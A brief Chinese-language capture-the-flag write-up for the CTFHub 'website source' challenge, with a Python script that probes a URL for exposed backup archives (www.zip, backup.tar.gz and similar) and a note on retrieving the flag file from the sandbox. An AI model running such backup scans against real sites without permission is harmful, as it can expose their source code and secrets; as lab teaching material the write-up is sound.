CTFHub-网站源码-wp

  • 根据网站提示,可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag,故自制测试脚本
import requests

url=(input("URL:"))
list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
list2=['tar', 'tar.gz', 'zip', 'rar']
for i in list1:
    for j in list2:
        url_f=url+'/'+i+'.'+j
        r=requests.get(url_f)
        if(r.status_code == 200):
            print(url_f)
  • 使用脚本得出备份文件名称
    CTFHub-网站源码-wp
  • 输入URL即可下载zip文件,解压后如下
    CTFHub-网站源码-wp
  • 分析后,使用http://challenge-9e6e15ec91bb75e5.sandbox.ctfhub.com:10800/flag_3081416043.txt 得出flag
上一篇:python爬取博客园信息用于归档--excel篇


下一篇:三种获取python列表中每个元素的下标位置的方法